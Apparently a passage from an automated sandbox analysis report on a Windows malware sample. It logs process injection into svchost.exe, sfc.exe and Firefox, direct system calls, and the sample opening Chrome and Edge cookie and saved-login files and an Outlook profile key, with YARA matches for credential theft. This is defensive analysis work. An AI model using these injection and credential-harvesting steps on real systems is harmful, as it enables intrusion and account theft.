Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h] 1_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h] 1_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h] 1_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h] 1_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h] 1_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h] 1_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h] 1_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h] 1_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h] 1_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6CA38 mov eax, dword ptr fs:[00000030h] 1_2_03C6CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h] 1_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h] 1_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h] 1_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h] 1_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h] 1_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h] 1_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h] 1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h] 1_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h] 1_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h] 1_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h] 1_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h] 1_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h] 1_2_03CB0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h] 1_2_03D04940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h] 1_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h] 1_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h] 1_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h] 1_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h] 1_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h] 1_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h] 1_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h] 1_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h] 1_2_03CBC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h] 1_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h] 1_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h] 1_2_03CBC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h] 1_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h] 1_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h] 1_2_03CB892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h] 1_2_03CC892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h] 1_2_03C5E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h] 1_2_03D008C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h] 1_2_03CFA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h] 1_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h] 1_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h] 1_2_03C30887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h] 1_2_03CBC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h] 1_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h] 1_2_03C60854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h] 1_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h] 1_2_03C34859
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_007880A9
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0075A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0075A155
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0075A124 SetUnhandledExceptionFilter, 0_2_0075A124

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtCreateFile: Direct from: 0x77752FEC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtOpenFile: Direct from: 0x77752DCC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtSetInformationThread: Direct from: 0x777463F9 Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtQueryInformationToken: Direct from: 0x77752CAC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtProtectVirtualMemory: Direct from: 0x77752F9C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtSetInformationProcess: Direct from: 0x77752C5C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtNotifyChangeKey: Direct from: 0x77753C2C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtOpenKeyEx: Direct from: 0x77752B9C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtOpenSection: Direct from: 0x77752E0C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtProtectVirtualMemory: Direct from: 0x77747B2E Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtAllocateVirtualMemory: Direct from: 0x777548EC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtQueryVolumeInformationFile: Direct from: 0x77752F2C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtQuerySystemInformation: Direct from: 0x777548CC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtAllocateVirtualMemory: Direct from: 0x77752BEC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtDeviceIoControlFile: Direct from: 0x77752AEC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtCreateUserProcess: Direct from: 0x7775371C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtWriteVirtualMemory: Direct from: 0x7775490C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtQueryInformationProcess: Direct from: 0x77752C26 Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtResumeThread: Direct from: 0x77752FBC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtReadVirtualMemory: Direct from: 0x77752E8C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtCreateKey: Direct from: 0x77752C6C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtSetInformationThread: Direct from: 0x77752B4C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtQueryAttributesFile: Direct from: 0x77752E6C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtAllocateVirtualMemory: Direct from: 0x77753C9C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtCreateMutant: Direct from: 0x777535CC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtWriteVirtualMemory: Direct from: 0x77752E3C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtMapViewOfSection: Direct from: 0x77752D1C Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtResumeThread: Direct from: 0x777536AC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtReadFile: Direct from: 0x77752ADC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtQuerySystemInformation: Direct from: 0x77752DFC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtDelayExecution: Direct from: 0x77752DDC Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe NtAllocateVirtualMemory: Direct from: 0x77752BFC Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Thread register set: target process: 1376 Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Thread APC queued: target process: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 305D008 Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007887B1 LogonUserW, 0_2_007887B1
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00733B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00733B3A
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_007348D7
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00794C7F mouse_event, 0_2_00794C7F
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPO2025KTI-1059.exe" Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00787CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00787CAF
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0078874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0078874B
Source: rPO2025KTI-1059.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000000.1896843764.0000000001710000.00000002.00000001.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2480003790.0000000001711000.00000002.00000001.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2480988705.0000000001381000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: rPO2025KTI-1059.exe, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000000.1896843764.0000000001710000.00000002.00000001.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2480003790.0000000001711000.00000002.00000001.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2480988705.0000000001381000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000000.1896843764.0000000001710000.00000002.00000001.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2480003790.0000000001711000.00000002.00000001.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2480988705.0000000001381000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000000.1896843764.0000000001710000.00000002.00000001.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2480003790.0000000001711000.00000002.00000001.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2480988705.0000000001381000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0075862B cpuid 0_2_0075862B
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00764E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00764E87
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00771E06 GetUserNameW, 0_2_00771E06
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00763F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00763F3A
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_007349A0

Stealing of Sensitive Information

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2477977050.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1977517644.0000000007FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2480569793.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1973374982.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2480573811.0000000002C20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2479760210.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1974135087.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2480693049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\sfc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: rPO2025KTI-1059.exe Binary or memory string: WIN_81
Source: rPO2025KTI-1059.exe Binary or memory string: WIN_XP
Source: rPO2025KTI-1059.exe Binary or memory string: WIN_XPe
Source: rPO2025KTI-1059.exe Binary or memory string: WIN_VISTA
Source: rPO2025KTI-1059.exe Binary or memory string: WIN_7
Source: rPO2025KTI-1059.exe Binary or memory string: WIN_8
Source: rPO2025KTI-1059.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2477977050.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1977517644.0000000007FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2480569793.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
